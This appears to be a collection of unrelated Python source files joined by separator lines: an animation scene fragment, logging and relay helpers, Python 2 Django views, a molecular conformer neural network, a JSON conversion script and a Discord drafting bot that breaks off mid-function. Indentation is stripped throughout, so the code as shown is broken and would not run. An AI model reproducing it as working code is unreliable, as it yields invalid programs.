self.sliding_blocks_config["block1_config"],
self.sliding_blocks_config["block2_config"],
]
for name_mob, config in zip(name_mobs, configs):
config["width"] = name_mob.get_width()
self.name_mobs = name_mobs
super().setup()
def add_blocks(self):
super().add_blocks()
blocks = self.blocks
name_mobs = self.name_mobs
blocks.fade(1)
def update_name_mobs(name_mobs):
for name_mob, block in zip(name_mobs, self.blocks):
name_mob.move_to(block)
target_y = block.get_bottom()[1] + SMALL_BUFF
curr_y = name_mob[0].get_bottom()[1]
name_mob.shift((target_y - curr_y) * UP)
name_mobs.add_updater(update_name_mobs)
self.add(name_mobs)
clack_y = self.name_mobs[1].get_center()[1]
for location, time in self.clack_data:
location[1] = clack_y
for block, name_mob in zip(blocks, name_mobs):
block.label.next_to(name_mob, UP)
block.label.set_fill(YELLOW, opacity=1)
# for name in names:
# file_name = name.replace(".", "")
# file_name += " Name Bump"
# scene = NameBump(
# name=name,
# write_to_movie=True,
# output_file_name=file_name,
# camera_config=PRODUCTION_QUALITY_CAMERA_CONFIG,
# )
|
import logging
import math
LOG_FORMAT = '%(asctime)s:%(levelname)s:%(message)s'
logging.basicConfig(filename='./Basic/div.log',
level=logging.DEBUG,
format=LOG_FORMAT)
def div(a, b):
try:
a/b
except ZeroDivisionError as e:
logging.error(e)
        logging.error(e, exc_info=True)  # capture the traceback by setting the exc_info parameter to True
else:
return a/b
a=2
b=0
div_result = div(a,b)
logging.debug(f'division of {a}/{b} : {div_result}')
|
# -*- coding: utf-8 -*-
def limit(value, v_min, v_max):
"""
limit a float or int python var
:param value: value to limit
:param v_min: minimum value
:param v_max: maximum value
:return: limited value
"""
try:
return min(max(value, v_min), v_max)
except TypeError:
return None
class Relay:
def __init__(self):
self._value = False
self._last_value = False
def update(self, state):
"""Set the current relay state."""
self._last_value = self._value
self._value = state
@property
def state(self):
"""Get the current relay state."""
return self._value
def trigger_pos(self):
"""True on positive edge."""
return self._value and not self._last_value
def trigger_neg(self):
"""True on negative edge."""
return self._last_value and not self._value
def toggle(self):
"""Toggle relay state."""
self.update(not self._value)
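# Hedged usage sketch: clamping a value and detecting a rising edge with Relay.
if __name__ == '__main__':
    print(limit(12, 0, 10))   # -> 10
    r = Relay()
    r.update(True)
    print(r.trigger_pos())    # -> True on the False -> True transition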
|
# Create your views here.
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.contrib import auth
from django.conf import settings
from django.template.context_processors import csrf
from django.shortcuts import render
from django.http import Http404
from django.http import HttpResponse
from django.http import HttpResponseRedirect
import json as simplejson
import urllib, urllib2, re, logging, json, uuid, ast, datetime, os.path
from time import time, sleep
from datetime import timedelta
from HTMLParser import HTMLParser
# Custom imports
from slack_messenger import SlackMessenger
# Setup logging
logging.basicConfig(level=logging.DEBUG, format='[%(asctime)s] %(levelname)s api - %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
################################################################################################
#
# Django Helpers
#
################################################################################################
def lg(msg, level=6):
if level == 0:
logging.error(str(msg))
else:
logging.info(str(msg))
return None
# end of lg
def process_exception(ex):
if settings.SEND_EX_TO_SLACK:
slack_msg = SlackMessenger(settings.USE_THIS_SLACK_CONFIG)
slack_msg.handle_send_slack_internal_ex(ex)
lg("Sent Slack Message", 0)
else:
lg("Hit Exception(" + str(ex) + ")", 0)
return None
# end of process_exception
def build_def_result(status="FAILED", error="Not Asssigned", record={}):
results = {
"Status" : status,
"Error" : error,
"Record" : record
}
return results
# end of build_def_result
################################################################################################
#
# Django Rendering Helper
#
################################################################################################
def shared_handle_render_to_response(request, short_name, normal_template, error_template, template_context):
try:
lg("Building Sharing Context", 6)
context = build_shared_template_content(request, normal_template)
lg("Returning Sharing Context", 6)
return render_to_response(normal_template, context, context_instance=RequestContext(request))
except Exception,k:
lg("Failed to render response: " + str(k), 0)
process_exception(k)
# end of try/ex
return None
# end of shared_handle_render_to_response
def build_shared_template_content(request, template):
try:
context = {
"ENV" : settings.TYPE_OF_SERVER,
"GA_TRACKING_CODE" : settings.GA_TRACKING_CODE
}
lg("Finding Meta(" + str(request.path) + ")", 6)
if str(request.path) in settings.META_PAGE_DATA:
for meta_name in settings.META_PAGE_DATA[str(request.path)]:
context[str(meta_name)] = settings.META_PAGE_DATA[str(request.path)][str(meta_name)]
# end of if this has seo meta data
session_hash = {}
if str(settings.SESSION_COOKIE) == "{}":
build_new_session(request, context, False)
else:
if str(settings.SESSION_COOKIE) in request.session and str(request.session[str(settings.SESSION_COOKIE)]) != "{}":
try:
session_hash = json.loads(request.session[str(settings.SESSION_COOKIE)])
return context
except Exception,sess:
lg("Invalid Session(" + str(request.session[str(settings.SESSION_COOKIE)]) + ") Ex(" + str(sess) + ")", 0)
# end of trying to decode session
# end of building the context for this user's identity for the template
# end of if/else existing session to check
return context
except Exception,k:
lg("Failed to build shared template content: " + str(k), 0)
process_exception(k)
# end of try/ex
return None
# end of build_shared_template_content
################################################################################################
#
# Django Session Helpers
#
################################################################################################
def build_new_session(request, session_hash, debug=False):
if debug:
lg("New Session Values(" + str(request.session) + ")", 6)
if str(settings.SESSION_COOKIE) in request.session:
if debug:
lg("Existing Session Cookie(" + str(request.session[settings.SESSION_COOKIE]) + ") Value(" + str(session_hash) + ")", 6)
request.session[str(settings.SESSION_COOKIE)] = session_hash
request.session.modified = True
return True
else:
request.session[str(settings.SESSION_COOKIE)] = session_hash
request.session.modified = True
return True
# end of Session Lite Checks
return False
# end of build_new_session
################################################################################################
#
# Django URL Handlers
#
################################################################################################
def internal_sitemap_xml(request):
return HttpResponse(open(str(settings.BASE_DIR) + "/webapp/sitemap.xml").read(), content_type='application/xhtml+xml')
# end of handle_sitemap_xml
def internal_robots_txt(request):
return HttpResponse(open(str(settings.BASE_DIR) + "/webapp/robots.txt").read(), content_type='text/plain')
# end of handle_robots_txt
def handle_home(request):
try:
lg("Home", 6)
# Change these for new URL Request Handlers:
short_name = "Home"
normal_template = str(settings.BASE_DIR) + "/webapp/templates/index.html"
if_there_is_an_error_template = str(settings.BASE_DIR) + "/webapp/templates/index.html"
template_context = {}
return shared_handle_render_to_response(request, short_name, normal_template, if_there_is_an_error_template, template_context)
except Exception,k:
lg("ERROR: " + str(k), 0)
process_exception(k)
# end of try/ex
return None
# end of handle_home
def handle_docs(request):
try:
lg("Docs Path(" + str(request.path) + ")", 6)
# Change these for new URL Request Handlers:
short_name = "Docs"
normal_template = str(settings.BASE_DIR) + "/webapp/templates/docs.html"
if_there_is_an_error_template = str(settings.BASE_DIR) + "/webapp/templates/docs.html"
template_context = {}
if str(request.path) != "/docs/":
filename = str(str(request.path).split("/")[-1])
normal_template = str(settings.STATIC_ROOT) + "/" + str(request.path).split("/")[-2] + "/" + str(request.path).split("/")[-1]
if os.path.exists(normal_template):
if ".txt" in filename:
lg("Docs(" + str(request.path) + ") Text(" + str(normal_template) + ")", 6)
return HttpResponse(open(normal_template).read(), content_type='text/plain')
else:
lg("Docs(" + str(request.path) + ") HTML(" + str(normal_template) + ")", 6)
else:
lg("Failed Doc Template(" + str(normal_template) + ")", 6)
normal_template = str(settings.BASE_DIR) + "/webapp/templates/" + str(request.path).split("/")[-1]
lg("Fallback-Docs(" + str(request.path) + ") Template(" + str(normal_template) + ")", 6)
# end of docs routing
return shared_handle_render_to_response(request, short_name, normal_template, if_there_is_an_error_template, template_context)
except Exception,k:
lg("ERROR: " + str(k), 0)
process_exception(k)
# end of try/ex
return None
# end of handle_docs
def handle_show_slack_error(request):
try:
lg("Slack Error Demo", 6)
try:
# Show the error in slack:
here_is_an_error_on_this_line # This will throw a 'not defined' error
except Exception,k:
lg("ERROR: " + str(k), 0)
process_exception(k)
# end of try/ex
lg("Done Slack Error Demo - Rerouting to Home for now", 6)
return handle_home(request)
except Exception,k:
lg("ERROR: " + str(k), 0)
process_exception(k)
# end of try/ex
return None
# end of handle_show_slack_error
################################################################################################
#
# Django Ajax Handler
#
################################################################################################
def handle_ajax_request(request):
status = "FAILED"
err_msg = "Nothing was processed"
record = {}
results = build_def_result(status, err_msg, record)
try:
################################################################################################
#
# Ajax handlers:
#
if request.is_ajax():
if request.method == "POST":
lg("Processing POST-ed AJAX", 6)
status = "SUCCESS"
err_msg = ""
post_results= handle_ajax_post(request)
if post_results["Status"] != "SUCCESS":
lg("ERROR: POST had error: " + str(post_results["Error"]), 0)
# end of if not successful
# Assign final results before sending back to the client:
status = post_results["Status"]
err_msg = post_results["Error"]
record = post_results["Record"]
elif request.method == "GET":
lg("Processing GET AJAX", 6)
status = "SUCCESS"
err_msg = ""
record = {}
else:
lg("Processing " + str(request.method) + ")", 6)
status = "SUCCESS"
err_msg = ""
record = {}
else:
lg("Invalid Ajax Request Sent to API", 0)
status = "Display Error"
err_msg = "Invalid Ajax Request Sent to API"
record = {}
# end of valid ajax post/get/other
results = build_def_result(status, err_msg, record)
except Exception,k:
err_msg = "Failed to handle AJAX Request with Ex(" + str(k) + ")"
        lg(err_msg, 0)
process_exception(k)
results = build_def_result("Display Error", err_msg, record)
# end of try/ex
response_content = simplejson.dumps(results)
return HttpResponse(response_content, content_type="application/json")
# end of handle_ajax_request
################################################################################################
#
# POST Handlers:
#
def handle_ajax_post(request):
status = "Display Error"
err_msg = "Failed to Process Post"
record = {
"StatusDiv" : "",
"ResultDiv" : ""
}
try:
posted_hash = simplejson.loads(request.body)
if "Action" not in posted_hash:
status = "Display Error"
err_msg = "Missing 'Action' Key in POST"
else:
action = str(posted_hash["Action"])
lg("POST - Processing(" + str(action) + ")", 6)
if action == "AjaxDemo":
proc_rs = handle_post_ajax_demo(posted_hash)
status = str(proc_rs["Status"])
err_msg = str(proc_rs["Error"])
record = proc_rs["Record"]
# end of AjaxDemo
else:
status = "Display Error"
err_msg = "Unsupported Ajax Action(" + str(action) + ")"
lg("ERROR: Failed POST" + str(err_msg), 0)
# If Slack is enabled, send the unsupported error:
if settings.SEND_EX_TO_SLACK:
slack_msg = SlackMessenger(settings.USE_THIS_SLACK_CONFIG)
slack_msg.handle_send_slack_internal_ex(err_msg)
# end of if send to slack
# end of if a supported server-side action
# end of handling all Posts
# Assign final results:
results = build_def_result(status, err_msg, record)
except Exception,e:
results = build_def_result("Display Error", "Failed to decode Post-ed JSON with Ex(" + str(e) + ")", record)
lg("ERROR: " + str(e), 0)
process_exception(e)
# end of try/ex
return results
# end of handle_ajax_post
# Specific POST Handlers:
def handle_post_ajax_demo(posted_hash):
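    # Expected keys in posted_hash (inferred from the reads below): "StatusDiv" and
    # "ResultDiv" are client div ids echoed back for rendering, and "Data" is a JSON
    # string that should contain a "SendToServer" value.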
action = "AjaxDemo"
status = "Display Error"
err_msg = "Failed to Process Post"
web_st_div = ""
web_rs_div = ""
record = {
"StatusDiv" : "",
"ResultDiv" : "",
"ResData" : {}
}
results = build_def_result(status, err_msg, record)
try:
lg("Running Server-side(" + str(action) + ")", 6)
# Assign the placeholders for coordinated server <-> client interaction for status and result fields
web_st_div = str(posted_hash["StatusDiv"])
web_rs_div = str(posted_hash["ResultDiv"])
now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
rq_data = json.loads(posted_hash["Data"])
rs_data = {
"Response" : str(now) + " - Failed to Process"
}
# Assume the demo is sending a key with SendToServer in the json...otherwise process it as a bad Post message
if "SendToServer" in rq_data:
lg("Valid(" + str(action) + ") Received(" + str(rq_data["SendToServer"]) + ")", 6)
status = "SUCCESS"
err_msg = "SUCCESS"
rs_data = {
"Response" : str(now) + " - Server Received: " + str(rq_data["SendToServer"])
}
else:
lg("Invalid(" + str(action) + ") Received(" + str(rq_data) + ")", 6)
status = "Display Error"
err_msg = "Missing 'SendToServer' Value in the POST Data"
rs_data = {
"Response" : str(now) + " - Server Error: " + str(err_msg)
}
# end of processing the POST-ed json requested rq_data
# Assign final results:
record = {
"StatusDiv" : web_st_div,
"ResultDiv" : web_rs_div,
"ResData" : rs_data
}
results = build_def_result(status, err_msg, record)
except Exception,e:
results = build_def_result("Display Error", "Failed to Process Action(" + str(action) + ") with Ex(" + str(e) + ")", record)
lg("ERROR: " + str(e), 0)
process_exception(e)
# end of try/ex
return results
# end of handle_post_ajax_demo
|
import random
import dgl
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from scipy.optimize import linear_sum_assignment
from utils.chem import NODE_FEATS, BOND_TYPES
from models import utils
from models.baseline_models.egnn import EnEquiNetwork
from models.baseline_models.se3_trans import EquiSE3Transformer
from models.uni_transformer import UniTransformerO2TwoUpdateGeneral
from models.uni_transformer_o3 import UniTransformerO3TwoUpdateGeneral
def compute_l2_loss(batch, labels, gen_pos):
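    # Distance-geometry loss: per-graph MSE between the pairwise-distance matrices of generated and ground-truth positions, summed over the batch.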
n_slices = np.cumsum([0] + batch.batch_num_nodes().tolist())
loss = 0.
for idx, graph in enumerate(dgl.unbatch(batch)):
pos = gen_pos[n_slices[idx]:n_slices[idx + 1]]
gt_pos = labels[n_slices[idx]:n_slices[idx + 1]]
gen_distmat = torch.norm(pos.unsqueeze(0) - pos.unsqueeze(1), p=2, dim=-1)
gt_distmat = torch.norm(gt_pos.unsqueeze(0) - gt_pos.unsqueeze(1), p=2, dim=-1)
loss += F.mse_loss(gen_distmat, gt_distmat, reduction='mean')
return loss, len(batch.batch_num_nodes())
def compute_min_loss(batch, labels, gen_pos, labels_slices, n_gen_samples, return_match_labels=False):
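    # Min-over-candidates loss: either several generated samples vs one reference (labels_slices is None), or one generated sample vs several reference conformers; the best-matching candidate is kept per graph, optionally returning the matched labels.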
n_slices = np.cumsum([0] + batch.batch_num_nodes().tolist())
if labels_slices is None: # multiple generated mols, one reference mol
assert n_gen_samples > 1
cur_idx = 0
loss = 0.
for idx, graph in enumerate(dgl.unbatch(batch)):
num_nodes = batch.batch_num_nodes().tolist()[idx]
end_idx = cur_idx + num_nodes * n_gen_samples
all_pos = gen_pos[cur_idx:end_idx].view(n_gen_samples, num_nodes, 3)
gt_pos = labels[n_slices[idx]:n_slices[idx + 1]]
min_loss = None
for n_idx in range(len(all_pos)):
pos = all_pos[n_idx]
gen_distmat = torch.norm(pos.unsqueeze(0) - pos.unsqueeze(1), p=2, dim=-1)
gt_distmat = torch.norm(gt_pos.unsqueeze(0) - gt_pos.unsqueeze(1), p=2, dim=-1)
dist_loss = F.mse_loss(gen_distmat, gt_distmat, reduction='mean')
if min_loss is None or dist_loss < min_loss:
min_loss = dist_loss
loss += min_loss
else:
l_slices = np.cumsum([0] + labels_slices)
loss = 0.
match_labels = []
for idx, graph in enumerate(dgl.unbatch(batch)):
pos = gen_pos[n_slices[idx]:n_slices[idx + 1]]
label = labels[l_slices[idx]:l_slices[idx + 1]].view(-1, len(pos), 3)
min_loss = None
for l_idx in range(len(label)):
gt_pos = label[l_idx]
gen_distmat = torch.norm(pos.unsqueeze(0) - pos.unsqueeze(1), p=2, dim=-1)
gt_distmat = torch.norm(gt_pos.unsqueeze(0) - gt_pos.unsqueeze(1), p=2, dim=-1)
dist_loss = F.mse_loss(gen_distmat, gt_distmat, reduction='mean')
if min_loss is None or dist_loss < min_loss:
min_loss = dist_loss
m_label = label[l_idx]
match_labels.append(m_label)
loss += min_loss
if return_match_labels:
return loss, len(batch.batch_num_nodes()), torch.cat(match_labels, dim=0)
else:
return loss, len(batch.batch_num_nodes())
def compute_wasserstein_loss(batch, labels, gen_pos, labels_slices):
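    # Set-to-set loss: optimally match generated and reference conformer sets on their distance-matrix MSEs via linear_sum_assignment, then average the per-pair RMS errors.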
l_slices = np.cumsum([0] + labels_slices)
loss = 0.
for idx, graph in enumerate(dgl.unbatch(batch)):
num_nodes = graph.number_of_nodes()
pos = gen_pos[l_slices[idx]:l_slices[idx + 1]].view(-1, num_nodes, 3) # [n_samples, n_nodes, 3]
label = labels[l_slices[idx]:l_slices[idx + 1]].view(-1, num_nodes, 3)
num_samples = pos.shape[0]
assert pos.shape == label.shape
gen_distmat = torch.norm(pos.unsqueeze(1) - pos.unsqueeze(2), p=2, dim=-1)
gt_distmat = torch.norm(label.unsqueeze(1) - label.unsqueeze(2), p=2, dim=-1) # [n_samples, n_nodes, n_nodes]
all_dist_loss = torch.zeros(num_samples, num_samples)
for i in range(num_samples):
for j in range(num_samples):
# todo: F.l1_loss?
all_dist_loss[i][j] = F.mse_loss(gen_distmat[i], gt_distmat[j],
reduction='sum') # [n_samples, n_nodes, n_nodes]
        # optimal bipartite matching between generated and reference samples (Hungarian algorithm; for large n_samples a cheaper matching may be needed)
gen_idx, gt_idx = linear_sum_assignment(all_dist_loss.detach().numpy())
dist_mse = F.mse_loss(gen_distmat[gen_idx, ...], gt_distmat[gt_idx, ...], reduction='none').view(-1, num_nodes * num_nodes)
wasserstein_loss = torch.mean(dist_mse.mean(-1).sqrt())
loss += wasserstein_loss
return loss, len(batch.batch_num_nodes())
def get_init_pos(propose_net_type, batch, labels, noise, gt_aug_ratio=0.05, noise_type='const',
n_ref_samples=1, n_gen_samples=1, labels_slices=None, eval_mode=False):
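    # Build the initial coordinates fed to the refinement network: ground-truth (+noise), RDKit poses (+noise), or random positions, with an occasional ground-truth augmentation step during training (gt_aug_ratio).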
l_slices = np.cumsum([0] + labels_slices) if labels_slices is not None else None
if not eval_mode and (propose_net_type != 'gt' and np.random.rand() < gt_aug_ratio):
# data augmentation step where we feed the correct pos to the model and expect zero delta
if n_ref_samples == n_gen_samples:
init_pos = labels
elif n_ref_samples == 1 and n_gen_samples > 1:
all_init_pos = []
n, cur_idx = 0, 0
for idx, num_nodes in enumerate(batch.batch_num_nodes().tolist()):
all_init_pos.append(labels[cur_idx:cur_idx + num_nodes])
n += 1
if n >= n_gen_samples:
cur_idx += num_nodes
n = 0
init_pos = torch.cat(all_init_pos)
elif n_gen_samples == 1 and n_ref_samples > 1:
all_init_pos = []
for idx, num_nodes in enumerate(batch.batch_num_nodes().tolist()):
label = labels[l_slices[idx]:l_slices[idx + 1]].view(-1, num_nodes, 3)
rand_idx = random.randint(0, len(label) - 1)
init_pos = label[rand_idx]
all_init_pos.append(init_pos)
init_pos = torch.cat(all_init_pos)
else:
raise NotImplementedError(f'n ref samples {n_ref_samples} and n gen samples {n_gen_samples} mismatch')
elif propose_net_type == 'rdkit' or propose_net_type == 'online_rdkit':
        # initialize the model input with the RDKit pos if generation was successful
if n_gen_samples == 1: # [n_nodes, n_samples, 3]
init_pos = batch.ndata['rdkit_pos'] + utils.noise_like(batch.ndata['rdkit_pos'], noise_type, noise)
else:
# tile batch when n_gen_sample > 1
# init_pos = batch.ndata['rdkit_pos'].permute(1, 0, 2).reshape(-1, 3)
# init_pos += utils.noise_like(init_pos, noise_type, noise)
init_pos = []
sample_idx = 0
for idx, graph in enumerate(dgl.unbatch(batch)):
pos = graph.ndata['rdkit_pos'][:, sample_idx % n_gen_samples] + utils.noise_like(
graph.ndata['rdkit_pos'][:, sample_idx % n_gen_samples], noise_type, noise)
sample_idx += 1
init_pos.append(pos)
init_pos = torch.cat(init_pos, dim=0).to(labels)
elif propose_net_type == 'random':
        # initialize the model input with random positions
init_pos = []
for n_nodes in batch.batch_num_nodes().tolist():
init_pos.append(torch.randn(n_nodes, 3) * (1 + n_nodes * noise))
init_pos = torch.cat(init_pos, dim=0).to(labels)
elif propose_net_type == 'gt':
        # initialize the model with ground truth + noise; evaluation uses the RDKit init instead
if n_ref_samples == n_gen_samples:
init_pos = labels + utils.noise_like(labels, noise_type, noise, labels_slices)
elif n_gen_samples == 1 and n_ref_samples > 1:
all_init_pos = []
for idx, num_nodes in enumerate(batch.batch_num_nodes().tolist()):
label = labels[l_slices[idx]:l_slices[idx + 1]].view(-1, num_nodes, 3)
rand_idx = random.randint(0, len(label) - 1)
init_pos = label[rand_idx] + utils.noise_like(label[rand_idx], noise_type, noise)
all_init_pos.append(init_pos)
init_pos = torch.cat(all_init_pos)
else:
raise ValueError('No need to make n_gen_samples > 1 when n_ref_samples = 1 and propose net is gt')
else:
raise ValueError(propose_net_type)
return init_pos
def get_refine_net(refine_net_type, config):
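    # Factory for the coordinate-refinement backbone selected in the config.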
# baseline
if refine_net_type == 'equi_se3trans':
refine_net = EquiSE3Transformer(
num_layers=config.num_layers,
atom_feature_size=config.hidden_dim,
num_channels=config.num_channels,
num_nlayers=config.num_nlayers,
num_degrees=config.num_degrees,
edge_dim=config.hidden_dim,
div=config.div,
n_heads=config.n_heads
)
elif refine_net_type == 'egnn':
refine_net = EnEquiNetwork(
num_layers=config.num_layers,
hidden_dim=config.hidden_dim,
edge_feat_dim=config.hidden_dim,
num_r_gaussian=config.num_r_gaussian,
update_x=True,
act_fn=config.act_fn,
norm=config.norm
)
# our model
elif refine_net_type == 'ours_o2':
refine_net = UniTransformerO2TwoUpdateGeneral(
num_blocks=config.num_blocks,
num_layers=config.num_layers,
hidden_dim=config.hidden_dim,
n_heads=config.n_heads,
edge_feat_dim=config.hidden_dim,
num_r_gaussian=config.num_r_gaussian,
num_node_types=config.num_node_types,
act_fn=config.act_fn,
norm=config.norm,
cutoff_mode=config.cutoff_mode,
ew_net_type=config.ew_net_type,
r_feat_mode=config.r_feat_mode,
energy_h_mode=config.energy_h_mode,
num_x2h=config.num_x2h,
num_h2x=config.num_h2x,
r_max=config.r_max,
x2h_out_fc=config.x2h_out_fc,
sync_twoup=config.sync_twoup
)
# our model
elif refine_net_type == 'ours_o3':
refine_net = UniTransformerO3TwoUpdateGeneral(
num_blocks=config.num_blocks,
num_layers=config.num_layers,
hidden_dim=config.hidden_dim,
n_heads=config.n_heads,
edge_feat_dim=config.hidden_dim,
num_r_gaussian=config.num_r_gaussian,
num_node_types=config.num_node_types,
act_fn=config.act_fn,
norm=config.norm,
cutoff_mode=config.cutoff_mode,
ew_net_type=config.ew_net_type,
r_feat_mode=config.r_feat_mode,
energy_h_mode=config.energy_h_mode,
num_x2h=config.num_x2h,
num_h2x=config.num_h2x,
num_init_x2h=config.num_init_x2h,
num_init_h2x=config.num_init_h2x,
r_max=config.r_max,
x2h_out_fc=config.x2h_out_fc,
sync_twoup=config.sync_twoup
)
else:
raise ValueError(refine_net_type)
return refine_net
class PosNet3D(nn.Module):
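    # Embeds node/edge features and refines 3D coordinates with the configured equivariant backbone.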
def __init__(self, config, node_type_dim=100, edge_type_dim=len(BOND_TYPES)):
super(PosNet3D, self).__init__()
self.refine_net_type = config.model_type
self.hidden_dim = config.hidden_dim
self.node_type_dim = node_type_dim
self.edge_type_dim = edge_type_dim
self.node_feat_dim = self.node_type_dim + len(NODE_FEATS)
self.edge_feat_dim = self.edge_type_dim + 1 # edge_conj_feat
if 'our' in self.refine_net_type and 'mix' in config.energy_h_mode:
self.node_emb = nn.Linear(self.node_feat_dim, self.hidden_dim * 2, bias=False)
else:
self.node_emb = nn.Linear(self.node_feat_dim, self.hidden_dim, bias=False)
self.edge_emb = nn.Linear(self.edge_feat_dim, self.hidden_dim, bias=False)
self.refine_net = get_refine_net(self.refine_net_type, config)
def forward(self, G, init_pos):
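        # G: batched DGLGraph carrying 'node_type'/'node_feat' and 'edge_type'/'edge_feat'; init_pos: [n_nodes, 3] initial coordinates.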
edge_index = torch.stack(G.edges()).to(G.ndata['node_type'].device)
node_feat = torch.cat([F.one_hot(G.ndata['node_type'], self.node_type_dim).to(G.ndata['node_feat']),
G.ndata['node_feat']], dim=-1)
node_attr = self.node_emb(node_feat)
edge_feat = torch.cat([F.one_hot(G.edata['edge_type'], self.edge_type_dim).to(G.ndata['node_feat']),
G.edata['edge_feat']], dim=-1)
edge_attr = self.edge_emb(edge_feat)
# refine coordinates with SE(3)-equivariant network
G.ndata['x'] = init_pos
src, dst = edge_index
G.edata['d'] = init_pos[dst] - init_pos[src]
G.ndata['f'] = node_attr.unsqueeze(-1)
G.edata['w'] = edge_attr
final_pos, all_pos = self.refine_net(G)
return final_pos, all_pos
def get_gen_pos(self, propose_net_type, batch, labels, noise, gt_aug_ratio, noise_type='const',
n_ref_samples=1, n_gen_samples=1, labels_slices=None, zero_mass_center=False,
eval_mode=False, fix_init_pos=None):
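        # End-to-end generation: build (or reuse) the initial positions, tiling the batch when several samples per molecule are requested, optionally zero-center them, then refine.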
if fix_init_pos is not None:
init_pos = fix_init_pos
else:
if eval_mode:
assert propose_net_type != 'gt'
if n_gen_samples == 1:
init_pos = get_init_pos(propose_net_type, batch, labels, noise, gt_aug_ratio, noise_type,
n_ref_samples, n_gen_samples, labels_slices, eval_mode=eval_mode)
else:
tile_batch = []
for idx, graph in enumerate(dgl.unbatch(batch)):
for _ in range(n_gen_samples):
tile_batch.append(graph)
batch = dgl.batch(tile_batch)
init_pos = get_init_pos(propose_net_type, batch, labels, noise, gt_aug_ratio, noise_type,
n_ref_samples, n_gen_samples, labels_slices, eval_mode=eval_mode)
if zero_mass_center:
# make the init_pos zero mass center
n_slices = np.cumsum([0] + batch.batch_num_nodes().tolist())
standard_init_pos = []
for idx, graph in enumerate(dgl.unbatch(batch)):
pos = init_pos[n_slices[idx]:n_slices[idx + 1]]
pos = pos - pos.mean(0)
standard_init_pos.append(pos)
init_pos = torch.cat(standard_init_pos, dim=0)
gen_pos, all_pos = self(batch, init_pos)
return init_pos, gen_pos, all_pos
|
import json
import datetime
import re
with open('./data.json') as f:
data = json.load(f)
data = data['data']
new_data = []
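# Each source row appears to be: [title, serial, region css class, status html, last tested version, crc, date (d-m-Y), wiki cell, forum cell].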
for entry in data:
title = entry[0]
serial = "{}-{}".format(re.split(r'(\d+)', entry[1])[0], re.split(r'(\d+)', entry[1])[1])
region = entry[2]
if "compatusa" in region:
region = "us"
elif "compatjapan" in region:
region = "ja"
elif "compateurope" in region:
region = "eu"
elif "compatkorea" in region:
region = "kr"
elif "compatchina" in region:
region = "ch"
elif "compatfrance" in region:
region = "fr"
elif "compatgermany" in region:
region = "de"
else:
print(region)
status = entry[3].split("<")[0]
last_tested_version = entry[4]
crc = entry[5]
    last_tested_date = datetime.datetime.strptime(entry[6], '%d-%m-%Y')  # source dates are d-m-Y; stored below as ISO 8601 via isoformat()
if "Not available" in entry[7]:
wiki_link = None
else:
wiki_link = entry[7].split("href=")[1].split(">")[0]
if "Not available" in entry[8]:
forum_link = None
else:
forum_link = entry[8].split('href=\"')[1].split('\"')[0]
new_data.append({
'title': title,
'serial': serial,
'crc': crc,
'region': region,
'status': status,
'last_tested_version': last_tested_version,
'last_tested_date': last_tested_date.isoformat(),
'wiki_link': wiki_link,
'forum_link': forum_link
})
with open('./data-new.json', 'w') as json_file:
json.dump(new_data, json_file, indent=2)
with open('./data-new.min.json', 'w') as json_file:
json.dump(new_data, json_file)
|
import discord
from discord.ext import commands
import sys
sys.path.append("../")
import os
import pickle
import asyncio
import re
import requests
import json
import collections
from random import*
from pathlib import Path
from .utils.draft import Draft
from .utils.player import Player
from .utils.dataIO import dataIO, fileIO
#from ext.enterdraftresults import manageLeaderboard
prefix = ["!"]
autodeletetime = 30
async def getRank(player):
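    # Rank is the 1-based index of the player's display name in the pickled leaderboard list.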
with open("leaderboard.p", "rb") as f:
l = pickle.load(f)
for i in range(len(l)):
if l[i][0] == player.display_name:
return i+1
async def getEmoji(bot, name):
return discord.utils.get(bot.get_all_emojis(), name=re.sub("[^a-zA-Z]", "", name))
async def updateDrafterRole(server, player):
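    # Rebuild the member's role list so that exactly one drafter tier (Classic/Rare/Epic/Legendary) matches the higher of this season's and last season's draft count.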
classicRole = discord.utils.get(server.roles, name="Classic Drafter")
rareRole = discord.utils.get(server.roles, name="Rare Drafter")
epicRole = discord.utils.get(server.roles, name="Epic Drafter")
legendaryRole = discord.utils.get(server.roles, name="Legendary Drafter")
user = server.get_member(player.id)
roles = user.roles
if classicRole in roles:
roles.remove(classicRole)
if rareRole in roles:
roles.remove(rareRole)
if epicRole in roles:
roles.remove(epicRole)
if legendaryRole in roles:
roles.remove(legendaryRole)
if player.draft_amount > player.old_draft_amount:
da = player.draft_amount
else:
da = player.old_draft_amount
if da <= 4:
roles.append(classicRole)
elif da >= 5 and da <= 9:
roles.append(rareRole)
elif da >= 10 and da <= 19:
roles.append(epicRole)
elif da >= 20:
roles.append(legendaryRole)
return roles
class Drafting():
"""Commands used for drafting"""
def __init__(self, bot):
self.bot = bot
self.opendrafts = []
self.cards = sorted(dataIO.load_json('data/drafting/cards.json'), key=lambda card: card["name"])
@commands.command(pass_context=True)
async def createdraft(self, ctx, *, optionalarguments=""):
"""creates a draft to join
        Only usable in the "monthly_mayhem" channel!
Open Drafts will be pinned to the channel to keep track of them.
Players can enter by reacting with the star emoji(clicking on it).
Cancel the creation of the draft with the octagonal sign
        optional arguments (separate with commas):
'size= ' (leaving this out creates a standard 8 man draft)
        'name= ' (leaving this out calls the draft '<creator>'s Draft')
        'eligible= ' (needs to be the name of a role; leaving this out makes it eligible for everyone and tags @Drafter)
        'tag' (if you mention this the bot will add @tag in the creation message. By default it tags @Drafter, but if you change who is eligible it will tag that role instead!)
'starttime= ' (The approximate starttime of the draft, you can leave this out)
        Example: '!createdraft size=4, tag, name=My fancy draft, starttime=2 am in the evening, eligible=V.I.P Drafter' creates a draft called 'My fancy draft' with size 4 only for V.I.P Drafters, as well as tagging them in the message and mentioning the starting time
"""
modRole = discord.utils.get(ctx.message.server.roles, name="Admin")
marshalRole = discord.utils.get(ctx.message.server.roles, name="Marshal")
draftlobby = discord.utils.get(ctx.message.server.channels, name="monthly_mayhem")
if ctx.message.channel != draftlobby:
await self.bot.say("This command should only be used in 'monthly_mayhem' so we can keep everything in one place 😉", delete_after=autodeletetime)
return
host = ctx.message.author
if not Path("data/drafting/playerData/"+host.id+".p").is_file():
await self.bot.say(host.mention+", you are not registered yet. Please do so with "+prefix[0]+"register if you want to participate in Monthly Mayhem", delete_after=autodeletetime)
return
if "size=" in optionalarguments:
size = int(optionalarguments.partition("size=")[2].partition(",")[0])
else:
size = 8
if size < 2:
if not marshalRole in host.roles and not modRole in host.roles:
